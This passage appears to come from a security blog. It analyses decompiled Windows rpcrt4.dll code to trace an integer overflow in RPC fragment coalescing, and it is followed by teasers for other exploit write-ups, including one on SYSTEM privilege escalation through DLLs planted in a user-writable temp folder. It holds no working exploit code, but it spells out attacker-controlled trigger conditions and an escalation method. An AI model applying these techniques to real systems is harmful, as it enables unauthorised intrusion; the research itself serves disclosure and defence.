          *(uint *)(this[0xf] + 0x1c8) = uVar6;
          iVar4 = OSF_SCALL::BeginRpcCall((longlong *)this[0xf],tcp_received,ppOVar20);
          goto LAB_18003d2b5;
        }
LAB_18008ffc1:
        uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)this[0xf],tcp_received,uVar13,0);
        iVar4 = (int)uVar8;
    }
    ...
  }
  ...
  if (tcp_received->pkt_type == '\x0b') { // Executed when the client send a BIND request
      if (this[9] != 0) {
        uVar3 = 0;
        goto LAB_18008ff47;
      }
      iVar4 = AssociationRequested((OSF_SCONNECTION *)this,tcp_received,uVar13,uVar6);
  }
  ...
}

BeginRpcCall() ends in calling ProcessReceivedPDU() that is the primary function doing the packet parse job. ProcessReceivedPDU() when arrive the first and last fragment request:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
        *(uint *)(this + 0x1d8) = local_res8[0]; // set the fragment len in the object
        *(char **)pdVar1 = tcp_payload->data;
        tcp_payload = pdVar14;
dispatchRPCCall:
                    /* if last frag set with first frag */
        *(undefined4 *)(this + 0x21c) = 3;
        if (((byte)this[0x2e0] & 4) != 0) {
          LOCK();
          *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
               *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
          *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
        }
        plVar13 = (longlong *)((ulonglong)tcp_payload & 0xffffffffffffff00 | (ulonglong)pkt_tyoe);
LAB_18003ad4f:
        uVar9 = DispatchRPCCall((longlong *)this,plVar13,puVar17); // process the remote call
        return uVar9;
  ...
}

ProcessReceivedPDU() when arrives the first fragment fragment request with last fragment flag unset:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
          /* it is not a the last frag */
          uVar5 = tcp_payload->alloc_hint; // client suggest to the server how many bytes it will need to handle the full request
          if (uVar5 == 0) {
            *(uint *)(this + 0x248) = local_res8[0];
            uVar5 = local_res8[0]; // set to the frag len if alloc hint is 0
          }
          else {
            *(uint *)(this + 0x248) = uVar5;
          }
          puVar17 = (uint *)(ulonglong)uVar5;
      /* Could not allocate more than: (this +0x138)+0x148 = 0x400000 */
          if (*(uint *)(**(longlong **)(this + 0x138) + 0x148) <= uVar5 &&
              uVar5 != *(uint *)(**(longlong **)(this + 0x138) + 0x148)) { // check to avoid possible integer overflow
            piVar11 = local_80;
            uVar18 = 0x1072;
            local_80[0] = 3;
            local_78 = uVar5;
            goto goto_adderror_and_send_fault;
          }
          *(undefined4 *)(this + 0x1d8) = 0;
          pdVar14 = pdVar1;
      /* allocate buffer for all the fragments data */
          lVar7 = GetBufferDo((OSF_SCALL *)tcp_payload->data,(void **)pdVar1,uVar5,0,0, in_stack_ffffffffffffff60);
          if (lVar7 == 0) goto do_;
fail:
          pdVar14 = (dce_rpc_t *)0xe;
          goto cleanupAndSendFault;
  ...
}

long __thiscall
OSF_SCALL::GetBufferDo
          (OSF_SCALL *this,void **param_1,uint len,int param_3,uint param_4,ulong param_5)

{
  long lVar1;
  OSF_SCALL *pOVar2;
  OSF_SCALL *dst;
  ulonglong uVar3;
  OSF_SCALL *local_res8;
  
  local_res8 = this;
  lVar1 = OSF_SCONNECTION::TransGetBuffer((OSF_SCONNECTION *)this,&local_res8,len + 0x18);
  if (lVar1 == 0) {
    if (param_3 == 0) {
      *param_1 = local_res8 + 0x18;
    }
    else {
      uVar3 = (ulonglong)param_4;
      dst = local_res8 + 0x18;
      pOVar2 = dst;
      memcpy(dst,*param_1,param_4);
      if ((longlong)*param_1 - 0x18U != 0) {
        BCACHE::Free((ulonglong)pOVar2,(longlong)*param_1 - 0x18U,uVar3);
      }
      *param_1 = dst;
    }
    lVar1 = 0;
  }
  else {
    lVar1 = 0xe;
  }
  return lVar1;
}

If the fragment received is the first but not the last then a new memory is allocated using GetBufferDo() routine. It’s interesting the check on the allocation_hint/fragment len that cannot be greater or equal to 0x400000, this is very important because of the strange implementation of GetBufferDo() that allocate len + 0x18 bytes.

If the packet is not the first fragment and not the last fragment:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
                    /* should enter this branch */
        if (*(void **)pdVar1 != (void *)0x0) {
do_:
          uVar5 = local_res8[0];
          if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0)) { // !RPC_INTERFACE_HAS_PIPES
            if ((*(int *)(this + 0x214) == 0) || (*(int *)(this + 0x1cc) != 0)) {
/* fragment len + current copied */
              uVar5 = local_res8[0] + *(uint *)(this + 0x1d8);
/* alloc_hint <= fragment length  */
              if (*(uint *)(this + 0x248) <= uVar5 && uVar5 != *(uint *)(this + 0x248)) {
                if (*(int *)(this + 0x1cc) != 0) goto LAB_18008ea09;
                *(uint *)(this + 0x248) = uVar5;
/* overflow check 0x40000  */
                puVar17 = (uint *)(**(OSF_SCALL ***)(this + 0x138) + 0x148);
                if (*puVar17 <= uVar5 && uVar5 != *puVar17) {
                  piVar11 = local_50;
                  uVar18 = 0x1073;
                  local_50[0] = 3;
                  local_48 = uVar5;
                  goto goto_adderror_and_send_fault;
                }
// reallocate because fragment len is greater than the alloc hint used during first fragment! 
                lVar7 = GetBufferDo(\**(OSF_SCALL ***)(this + 0x138),(void **)pdVar1,uVar5,1,
                                    *(uint *)(this + 0x1d8),in_stack_ffffffffffffff60);
                if (lVar7 != 0) goto fail;
              }
              uVar5 = local_res8[0];
              puVar17 = (uint *)(ulonglong)local_res8[0];
//copy fragment data into the alloced buffer
              memcpy((void *)((longlong)*(void **)pdVar1 + (ulonglong)*(uint *)(this + 0x1d8)),tcp_payload->data,local_res8[0]);
              *(uint *)(this + 0x1d8) = *(int *)(this + 0x1d8) + uVar5;
              if ((pkt_flags & 2) == 0) {
                return 0; // if it is not the last fragment return 0
              }
              goto dispatchRPCCall; // dispatch the request only if it is the last fragment
            }
      }
      else if (pkt_tyoe == 0) {
    /* here if the packet type is 0, i.e. request */
        if (*(int *)(this + 0x214) == 0) {
          ...               
          uVar15 = GetBufferDo(\**(OSF_SCALL ***)(this + 0x138),(void **)pdVar1,uVar15,1, *(uint *)(this + 0x1d8),in_stack_ffffffffffffff60);
          pdVar14 = (dce_rpc_t *)(ulonglong)uVar15;
          if (uVar15 != 0) goto cleanupAndSendFault;
          ...
              memcpy((void *)((ulonglong)*(uint *)(this + 0x1d8) + *(longlong *)(this + 0xe0)), tcp_payload->data,uVar5);
          ...
              *(uint *)(this + 0x1d8) = *(int *)(this + 0x1d8) + uVar5;
              (\**(code \**)(**(longlong **)(this + 0x130) + 0x40))();
              if (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) {
                return 0;
              }
              if ((pkt_flags & 2) == 0) {
                *(undefined4 *)(this + 0x230) = 0;
              }
              else {
                *(undefined4 *)(this + 0x21c) = 3;
                if (((byte)this[0x2e0] & 4) != 0) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
              }
              plVar13 = (longlong *)0x0;
              goto Dispatch_rpc_call;
        }
        else{
          ...
          /* store frag len */
          uVar5 = local_res8[0];
          iVar8 = QUEUE::PutOnQueue((QUEUE *)(this + 600),tcp_payload->data,local_res8[0]);
          if (iVar8 == 0) {
          /* integer overflow! */
          *(uint *)(this + 0x24c) = *(int *)(this + 0x24c) + uVar5;
          ...
        }
}

Basically, the middle fragments are just copied in the alloced buffer under some conditions.

The DispatchRPC() seems to be the dispatcher of the full request, indeed it calls then the routine to handle the request, unmarshalling parameters and executing the
procedure remotely invoked. It is interesting that:

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  if (*(int *)((longlong)param_1 + 0x1cc) < 1) {
    *(undefined4 *)((longlong)param_1 + 0x214) = 1;
    ...
}

*(int *)((longlong)param_1 + 0x1cc seems to be zero so ` *(undefined4 *)((longlong)param_1 + 0x214) = 1;` this instruction takes place.


It’s possible to force the DispatchRpcCall() and still accept fragments for the same call id? The response to this question is yes!

Looking at ProcessReceivedPDU() exists a path that leads to execute the DispatchRpcCall() without sending any last fragment. The constraints:

  1. Server configured with RPC_INTERFACE_HAS_PIPES -> int at offset 0x58 in the rpc interface defined in the server has second bit to 1
  2. Client sends a first fragment, that initiliaze the call id object
  3. Client sends the second fragment without first and last flag enabled, this ends to call DispatchRpcCall() that sets param_1 + 0x214 to 1.
  4. Client alloc hint sent in the first fragment must be equal to the copied buffer len at the end of second fragment.

This will lead the code to enter DispatchRpcCall() and make nexts client’s fragments to be handled by the buggy code.

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
            else if (pkt_tyoe == 0) {
                    /* here if the packet type is 0, i.e. request */
            if (*(int *)(this + 0x214) == 0) {
              puVar17 = (uint *)(ulonglong)local_res8[0];
              uVar15 = *(uint *)(this + 0x1d8) + local_res8[0];
              ...
              if (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) { // cheat on this to make fragments appear as the last!
                // 0x1d8 contain already copied bytes until this request!
                // 0x248 contains the alloc hint!
                return 0;
              }
              if ((pkt_flags & 2) == 0) {
                *(undefined4 *)(this + 0x230) = 0;
              }
              else {
                *(undefined4 *)(this + 0x21c) = 3;
                if (((byte)this[0x2e0] & 4) != 0) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
              }
              plVar13 = (longlong *)0x0;
              goto Dispatch_rpc_call;
  ...
}

At this point, it’s possible to write a PoC following the previous constraints, the PoC has been tested against my RPC Server using ncacn_np protocol.

With the poc seems to be impossible to trigger the vulnerability due some checks in ProcessReceivedPDU(): Basically the check, that makes impossible to overflow the integer, is executed on the queue messages size.

OSF_SCALL::ProcessReceivedPDU()
{
  ...
              iVar8 = QUEUE::PutOnQueue((QUEUE *)(this + 600),tcp_payload->data,local_res8[0]);
              if (iVar8 == 0) {
                    /* integer overflow! */
                *(uint *)(this + 0x24c) = *(int *)(this + 0x24c) + uVar5;
                if (((pkt_flags & 2) != 0) &&
                   (*(undefined4 *)(this + 0x21c) = 3, ((byte)this[0x2e0] & 4) != 0)) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
                if (*(longlong *)(this + 0x18) != 0) {
                  if ((*(uint *)(this + 0x250) == 0) ||
                     ((*(uint *)(this + 0x24c) < *(uint *)(this + 0x250) &&
                      (*(int *)(this + 0x21c) != 3)))) {
                    if ((3 < *(int *)(this + 0x264)) &&
                       ((*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0 &&
                        (uVar9 = 0, *(int *)(this + 0x21c) != 3)))) {
                      *(undefined4 *)(this + 0x2ac) = 1;
                      uVar9 = uVar19; // critical instruction that makes processreceivepdu return 1
                    }
                  }
                  else {
                    *(undefined4 *)(this + 0x250) = 0;
                    SCALL::IssueNotification((SCALL *)this,2);
                  }
                  RtlLeaveCriticalSection(pOVar3);
                  return uVar9;
                }
                if (((3 < *(int *)(this + 0x264)) &&
                    (*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0)) &&
                   (*(int *)(this + 0x21c) != 3)) {
                  *(undefined4 *)(this + 0x2ac) = 1;
                  uVar9 = uVar19; // critical instruction that makes processreceivepdu return 1; My code entered heres
                }
                RtlLeaveCriticalSection(pOVar3);
                SetEvent(*(HANDLE *)(this + 0x2c0));
                return uVar9; // 
              }
  ...

When ProcessReceivedPDU() returns 1, it stops to listen for new messages so the client cannot trigger vulnerability anymore.

LAB_18008ffc1:
        uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)this[0xf],tcp_received,uVar13,0);
        iVar4 = (int)uVar8;
      }
LAB_18003d2b5:
      if (iVar4 == 0) {
LAB_18003d3c3:
        (**(code **)(*this + 0x38))(); -> OSF_SCONNECTION::TransAsyncReceive() continues to read from the descriptor new packets
      }
      REFERENCED_OBJECT::RemoveReference(this);
      goto LAB_18003d2c5;
    }

In order to not enter the critical paths that lead the server stopping listen for new packets, in the same connection of course, it’s required that one of these should not be satisfied:

3 < *(int *)(this + 0x264) // number of queued packets
*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0 // don't know
*(int *)(this + 0x21c) != 3  // can be unsatisfied on the packet with last fragmente flag enabled

*(this + 0x21c)  is set to 3 if the packets has the last fragment enabled.

The number of queued packets is incremented on a PutOnQueue() and decremented on a TakeOffQueue(), at most the queue could contain 4 packets. To me this was so strange because the application was multithread but looked like a monothread just because I did’t see any TakeOffQueue() called during my experiments.

int __thiscall QUEUE::PutOnQueue(QUEUE *this,void *param_1,uint param_2)
{
  ...
  *(int *)(this + 0xc) = iVar6 + 1;
  **(void ***)this = param_1;
  *(uint *)(*(longlong *)this + 8) = param_2;
  return 0;
}


undefined8 QUEUE::TakeOffQueue(longlong *param_1,undefined4 *param_2)
{
  int iVar1;
  
  iVar1 = *(int *)((longlong)param_1 + 0xc);
  if (iVar1 == 0) {
    return 0;
  }
  *(int *)((longlong)param_1 + 0xc) = iVar1 + -1;
  *param_2 = *(undefined4 *)(*param_1 + -8 + (longlong)iVar1 * 0x10);
  return *(undefined8 *)(*param_1 + (longlong)*(int *)((longlong)param_1 + 0xc) * 0x10);
}

In general my thought on the server status was the following:

  1. A Thread running somewhere in the DispatcRpcCall() after the packet that forced to call DispatchRpcCall() has been received, i.e. constrants number 3.
  2. A Thread continuing to read from the medium, did not know from.

So, I inspected better DispatcRpcCall().

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  ...
    uVar3 = RpcpConvertToLongRunning(this,param_2,param_3);
    bVar7 = (int)uVar3 != 0;
    if (bVar7) {
      uVar1 = 0xe;
    }
    else {
      this = (longlong *)param_1[0x26];
      uVar1 =  OSF_SCONNECTION::TransAsyncReceive(); // this should wake up a thread to handle new incoming packet
    }
    if (uVar1 == 0) {
      pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      DispatchHelper(param_1);
      if (*(int *)(pOVar6 + 0x18) == 0) { // this is the (this + 0x130) + 0x18)
        OSF_SCONNECTION::DispatchQueuedCalls(pOVar6);
      }
      pcVar4 = OSF_SCALL::RemoveReference(); // calling this means that the connection is over!
    }
    else {
      uVar3 = param_1[0x1c] - 0x18;
      if (uVar3 != 0) {
        BCACHE::Free((ulonglong)this,uVar3,param_3);
      }
      if (bVar7) {
        CleanupCallAndSendFault(param_1,(ulonglong)uVar1,0);
      }
      else {
        CleanupCall(param_1,uVar3,param_3);
      }
      pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      if (*(int *)(pOVar6 + 0x18) == 0) {
        OSF_SCONNECTION::AbortQueuedCalls(pOVar6);
        pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      }
  ...
}

int OSF_SCONNECTION::TransAsyncReceive(longlong *param_1,undefined8 param_2,undefined8 param_3)

{
  int iVar1;
  
  REFERENCED_OBJECT::AddReference((longlong)param_1,param_2,param_3);
  if (*(int *)(param_1 + 5) == 0) {
                    /* CO_Recv */
    iVar1 = CO_Recv(); // return true if a packet has been read
    if (iVar1 != 0) {
      if ((*(int *)(param_1 + 3) != 0) && (*(int *)((longlong)param_1 + 0x1c) == 0)) {
        OSF_SCALL::WakeUpPipeThreadIfNecessary((OSF_SCALL *)param_1[0xf],0x6be);
      }
      *(undefined4 *)(param_1 + 5) = 1;
      AbortConnection(param_1);
    }
  }
  else {
    AbortConnection(param_1);
    iVar1 = -0x3ffdeff8;
  }
  return iVar1;
}

ulonglong CO_Recv(PSLIST_HEADER param_1,undefined8 param_2,SIZE_T param_3)

{
  uint uVar1;
  ulonglong uVar2;
  
  if ((*(int *)&param_1[4].field_0x8 != 0) &&
     (*(int *)&param_1[4].field_0x8 == *(int *)&param_1[4].field_0x4)) {
    uVar1 = RPC_THREAD_POOL::TrySubmitWork(CO_RecvInlineCompletion,param_1);
    uVar2 = (ulonglong)uVar1;
    if (uVar1 != 0) {
      uVar2 = 0xc0021009;
    }
    return uVar2;
  }
  uVar2 = CO_SubmitRead(param_1,param_2,param_3); // ends in calling NMP_CONNECTION::Receive
  return uVar2;
}

According to my breakpoints, TransAsyncReceive() is executed and this led the server in waiting for a new packet after the packet that led to DispatchRpcCall(). If it, TransAsyncReceive(), returns 0 then the packet should has been read and handled by another thread, indeed it proceds calling DispatchHelper(). At this point, I imagined two threads:

  1. A thread started from TransAsyncReceive() that handle new packet and lead to enter in the ProcessReceivedPDU() continues to read until it not returns 1.
  2. A Thread that enters in DispatchHelper().

So, I started to track the memory at (this + 0x130) + 0x18 to identify where it’s written to 1. Because if it is not 0 then the condition that lead ProcessReceivedPDU() returning 1 is not satisfied anymore then it continue to read and because if it is 0 then a TakeOffQueue() is executed from DispatchRpcCall().

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  ...
      if (*(int *)(pOVar6 + 0x18) == 0) {
        OSF_SCONNECTION::DispatchQueuedCalls(pOVar6);
      }
  ...
}

void __thiscall OSF_SCONNECTION::DispatchQueuedCalls(OSF_SCONNECTION *this)
{
  longlong *plVar1;
  undefined4 local_res8 [2];
  
  while( true ) {
    RtlEnterCriticalSection(this + 0x118);
    plVar1 = (longlong *)QUEUE::TakeOffQueue((longlong *)(this + 0x1b8),local_res8); // decrement no. queued messaeges 
    if (plVar1 == (longlong *)0x0) break;
    RtlLeaveCriticalSection();
    OSF_SCALL::DispatchHelper(plVar1);
    ...
  }
  ...
  return;
}

(this + 0x130) + 0x18 is set to 1, during the association request at offset rpcrt4.dll+0x38b99, just if the packet flag multiplexed is not set.

void OSF_SCONNECTION::AssociationRequested
               (OSF_SCONNECTION *param_1,dce_rpc_t *tcp_received,uint param_3,int param_4)
{

        if ((tcp_received->pkt_flags & 0x10U) == 0) {
          *(undefined4 *)(param_1 + 0x18) = 1;
          *(byte *)((longlong)pppppvVar21 + 3) = *(byte *)((longlong)pppppvVar21 + 3) | 3;
        }
}

So, setting the RPC_HAS_PIPE in the server interface and specifying MULTIPLEX flag during the connection, it is under client control, will lead the code into the vulnerable point. At this point the debugger enters in the OSF_SCALL::GetCoalescedBuffer() that is another vulnerable call.

The code enter here from this stack trace:

rpcrt4.dll+0xb404d in OSF_SCALL::Receive()
rpcrt4.dll+0x4b297 in RPC_STATUS I_RpcReceive()
rpcrt4.dll+0x82422 in NdrpServerInit()
rpcrt4.dll+0x1c35e in NdrStubCall2()
                      NdrServerCall2()
rpcrt4.dll+0x57832 in DispatchToStubInCNoAvrf()
rpcrt4.dll+0x39e00 in RPC_INTERFACE::DispatchToStubWorker()
rpcrt4.dll+0x39753 in DispatchToStub()
rpcrt4.dll+0x3a2bc in OSF_SCALL::DispatchHelper()
                      DispatchRPCCall()

So using this PoC we enter every n packets in the coalesced buffer triggering the second integer overflow.

The routine OSF_SCALL::GetCoalescedBuffer() is reached just because the server has RPC_HAS_PIPE configured. Analyzing the stack trace from the last function before OSF_SCALL::GetCoalescedBuffer() I searched some constraints I satisfied that led me to the vulnerable code.

long __thiscall OSF_SCALL::Receive(OSF_SCALL *this,_RPC_MESSAGE *param_1,uint param_2)
{
  ...
      while (iVar3 = *(int *)(this + 0x21c), iVar3 != 1) { // this+ 0x21c seems not set to 1 in ProcessReceivedPDU, did not found where it is
        
        if (iVar3 == 2) {
          return *(long *)(this + 0x20);
        }
        if (iVar3 == 3) { // it is equal to 3 on the last frag packet, from ProcessReceivedPDU
          lVar2 = GetCoalescedBuffer(this,param_1,iVar4);
          return lVar2; // last frag received -> no more packets will be waited!
        }
        // if the total queued packets length is less or equal to the allocation hint received than wait for new data
        if (*(uint *)(this + 0x24c) <= (uint)*(ushort *)(*(longlong *)(this + 0x130) + 0xb8) { 
          EVENT::Wait((EVENT *)(this + 0x2c0),-1); // wait for other packets
        }
        else { 
          lVar2 = GetCoalescedBuffer(this,param_1,iVar4); // run coalesced buffer
          if (lVar2 != 0) { // error
            return lVar2;
          }
          ...
        }
        ...
      }
  ...
}

// (uint)*(ushort *)(*(longlong *)(this + 0x130) + 0xb8 is set during the association request
void OSF_SCONNECTION::AssociationRequested
               (OSF_SCONNECTION *param_1,dce_rpc_t *tcp_received,uint param_3,int param_4)
{
  ...
    uVar18 = *(ushort *)((longlong)&tcp_received->alloc_hint + 2);
    if ((*(byte *)&tcp_received->data_repres & 0xf0) != 0x10) {
      uVar26 = *(uint *)&tcp_received->cxt_id;
      uVar23 = uVar23 >> 8 | uVar23 << 8;
      uVar18 = uVar18 >> 8 | uVar18 << 8;
      *(ushort *)((longlong)&tcp_received->alloc_hint + 2) = uVar18;
      *(uint *)&tcp_received->cxt_id =
           uVar26 >> 0x18 | (uVar26 & 0xff0000) >> 8 | (uVar26 & 0xff00) << 8 | uVar26 << 0x18;
      *(ushort *)&tcp_received->alloc_hint = uVar23;
    }
    puVar24 = (undefined4 *)(ulonglong)uVar23;
    uVar14 = (ushort)*(undefined4 *)(*(longlong *)(param_1 + 0x20) + 0x4c);
    uVar3 = 0xffff;
    if (uVar23 != 0xffff) {
      uVar3 = uVar23;
    }
    if (uVar3 <= uVar18) {
      uVar18 = uVar3;
    }
    if (uVar18 <= uVar14) {
      uVar14 = uVar18;
    }
    *(ushort *)(param_1 + 0xb8) = uVar14 & 0xfff8; // set equal to the allocation hint & 0xfff8 of the first association packet!
  ...
}

Basically from OSF_SCALL::Receive() the code continuosly waits for new packets until a last fragment packet is received or any error is found.

GetCoalescedBuffer() is called if the last fragment is received or if the total len accumulated during the ProcessReceivedPDU() is greater than the alloc_hint, for these condition every n packets it is called.

So, just increasing the fragment length in the PoC it’s possible to trigger GetCoalescedBuffer() without setting MULTIPLEX. Moreover, OSF_SCALL::Receive() is reached because Message->RpcFlags & 0x8000 == 0

RPC_STATUS I_RpcReceive(PRPC_MESSAGE Message,uint Size)
{
  ...
    if ((Message->RpcFlags & 0x8000) == 0) {
                    /* get  OSF_SCALL::Receive address */
      pcVar5 = *(code **)(*plVar7 + 0x38);
    }
    else {
                    /* get NDRServerInitializeMarshall address */
      pcVar5 = *(code **)(*plVar7 + 0x48);
    }
                    /* call coalesced buffer */
    uVar2 = (*pcVar5)();
  ...
}

void NdrpServerInit()
{
  ...
    if (param_5 == 0) {
      if ((*(byte *)(*(ushort **)(puVar2 + 0x10) + 2) & 8) == 0) {
        ...

        ...
        if ((param_2->RpcFlags & 0x1000) == 0) {  // During my tests this value was 0 each time, didnt searched when this could fail
        param_2->RpcFlags = 0x4000;               // makes to call GetCoalescedBuffer()
        puStackY96 = (undefined *)0x180082427;
        exception = I_RpcReceive(param_2,0);
        if (exception != 0) {
                    /* WARNING: Subroutine does not return */
          puStackY96 = &UNK_180082432;
          RpcRaiseException(exception);
        }
        param_1->Buffer = (uchar *)param_2->Buffer;
        puVar10 = (uchar *)param_2->Buffer;
        param_1->BufferStart = puVar10;
        param_1->BufferEnd = puVar10 + param_2->BufferLength;
        param_3 = pMVar20;
      }
  ...
}

GetCoalescedBuffer() is used to merge queued buffers to the last received packet that has not been queued, indeed it allocates the total length needed and copy there every queued message then.

long __thiscall OSF_SCALL::GetCoalescedBuffer(OSF_SCALL *this,_RPC_MESSAGE *param_1,int param_2)
{
  ...
  iVar5 = *(int *)(this + 0x24c);
  if (iVar5 != 0) {
    if (uVar3 != 0) {
  /* integer overflow */
      iVar5 = iVar5 + *(int *)(param_1 + 0x18);
    }
    lVar2 = OSF_SCONNECTION::TransGetBuffer((OSF_SCONNECTION *)this_00,&local_res8,iVar5 + 0x18);
    if (lVar2 == 0) {
      dst_00 = (void *)((longlong)local_res8 + 0x18);
      dst = dst_00;
      local_res8 = dst_00;
      if ((uVar3 != 0) && (*(void **)(param_1 + 0x10) != (void *)0x0)) {
        memcpy(dst_00,*(void **)(param_1 + 0x10),*(uint *)(param_1 + 0x18));
        local_res8 = (void *)((ulonglong)*(uint *)(param_1 + 0x18) + (longlong)dst_00);
        OSF_SCONNECTION::TransFreeBuffer() // free last message PDU received
  ...
      }
      while (src = (void *)QUEUE::TakeOffQueue((longlong *)(this + 600),(undefined4 *)&local_res8), src != (void *)0x0) { 
        // loop to consume the queue merging the queued packets
        uVar4 = (ulonglong)local_res8 & 0xffffffff;
        memcpy(dst,src,(uint)local_res8);
                    /* OSF_SCONNECTION::TransFreeBuffer  */
        OSF_SCONNECTION::TransFreeBuffer() // free PDU buffer queued
        dst = (void *)((longlong)dst + uVar4);
      }
      ...
      *(undefined4 *)(this + 0x24c) = 0;
      ...
}

At this point from the new constraints found merging to the old ones it’s possible to resume the conditions that lead to vulnerable point:

  1. Server configured with RPC_INTERFACE_HAS_PIPES -> integer at offset 0x58 in the rpc interface defined in the server has second bit to 1 - **Not under attacker control **
  2. Client sends a first fragment, that initiliaze the call id object and satisfies the condition to call directly DispatchRpcCall(), sending fragment long just as the alloc hint set in this way: (*(int *)(this + 0x1d8) != *(int *)(this + 0x248) in ProcessReceivedPDU() lead to execute DispatchRpcCall() and so param_1 + 0x214 is set to 1 - Under attacker control
  3. Client continues to send middle fragments until: iVar5 = iVar5 + *(int *)(param_1 + 0x18); overflows and lead memcpy() to overflow the buffer - Under attacker control

Bad points:

  1. fragment length it’s two bytes long, very hard to exploit because it’s time and memory consuming - Under attacker control, Highly constrained
  2. I found no way to cheat on the fragment length value and sent bytes, i.e. they should be coherent between each other.

These lead to send a large number of fragments and consequentely the exploitation could be impossible due to system memory, i.e. the server just before request that overlow the integer should be able, in the coalesce buffer, to allocate 4gb of memory. If the memory is not allocated then an exception is raised. Anyway, assuming that the rpc server could allocate more than 4GB, there is the problem of the time. Indeed the packet’s number to send is very big and the processing time of the packets increase enormously according to the total length of the queued data.

My final is available here PoC, below is shown in the debugger the breakpoint on the vulnerable add operation in the function to coalesce buffers.

Trying To Exploit A Windows Kernel Arbitrary Read Vulnerability

Introduction I recently discovered a very interesting kernel vulnerability that allows the reading of arbitrary kernel-mode address. Sadly, the vulnerability was patched in Windows 21H2 (OS Build 22000.675), and I am unsure of the CVE being assigned to it. In this short blog post, I will share my journey of trying to exploit this vulnerability. Although I didn’t finish the exploit in the end, I have decided to share this with everyone anyway.

This Font is not Your Type

Half a year ago, I found a vulnerability in libFontParser.dylib, which is a part of CoreGraphics library that is widely used in macOS, iOS, iPadOS to parse and render fonts. This vulnerability was patched in iOS 13.5.1 & macOS 10.15.5. In this writeup, I will describe the bug in detail in hopes that it will help others to better understand this vulnerability. This issue could allow an attacker to execute code during the parsing of a malicious font.

HackSys Extreme Vulnerable Driver 3 - Double Fetch

This post is a writeup of a Double Fetch in HackSys Extreme Vulnerable driver - we assume that you already have an environment setup to follow along. However, if you don’t have an environment setup in this post we use: Windows 10 Pro x64 RS1 HEVD 3.00 If you are not sure how to setup a kernel debugging environment you can find plenty of posts of the process online, we will not cover the process in this post.

CVE Farming through Software Center – A group effort to flush out zero-day privilege escalations

Intro

In this blog post we discuss a zero-day topic for finding privilege escalation vulnerabilities discovered by Ahmad Mahfouz. It abuses applications like Software Center, which are typically used in large-scale environments for automated software deployment performed on demand by regular (i.e. unprivileged) users.

Since the topic resulted in a possible attack surface across many different applications, we organized a team event titled “CVE farming” shortly before Christmas 2021.

Attack Surface, 0-day, … What are we talking about exactly?

NVISO contributors from different teams (both red and blue!) and Ahmad gathered together on a cold winter evening to find new CVEs.

Targets? More than one hundred installation files that you could normally find in the software center of enterprises.
Goal? Find out whether they could be used for privilege escalation.

The original vulnerability (patient zero) resulting in the attack surface discovery was identified by Ahmad and goes as follows:

Companies correctly don’t give administrative privileges to all users (according to the least privilege principle). However, they also want the users to be able to install applications based on their business needs. How  is this solved? Software Center portals using SCCM (System Center Configuration Manager, now part of Microsoft Endpoint Manager) come to the rescue. Using these portals enables users to install applications without giving them administrative privileges.

However, there is an issue. More often than not these portals run the installation program with SYSTEM privileges, which in their turn use a temporary folder for reading or writing resources used during installation. There is a special characteristic for the TMP environment variable of SYSTEM. And that is – it is writable for a regular user.

Consider the following example:

By running the previous command, we just successfully wrote to a file located in the TEMP directory of SYSTEM.

Even if we can’t read the file anymore on some systems, be assured that the file was successfully  written:

To check that SYSTEM really has TMP pointing to C:\Windows\TEMP, you could run the following commands (as administrator):

PsExec64.exe /s /i cmd.exe

echo %TMP%

The /s option of PsExec tells the program to run the process in the SYSTEM context. Now if you would try to write to a file of an Administrator account’s TMP directory, it would not work since your access is denied. So if the installation runs under Administrator and not SYSTEM, it is not vulnerable to this attack.

How can this be abused?

Consider a situation where the installation program, executed under a SYSTEM context:

  • Loads a dll from TMP
  • Executes an exe file from TMP
  • Executes an msi file from TMP
  • Creates a service from a sys file in TMP

This provides some interesting opportunities! For example, the installation program can search in TMP for a dll file. If the file is present, it will load it. In that case the exploitation is simple; we just need to craft our custom dll, rename it, and place it where it is being looked for. Once the installation runs we get code execution as SYSTEM.

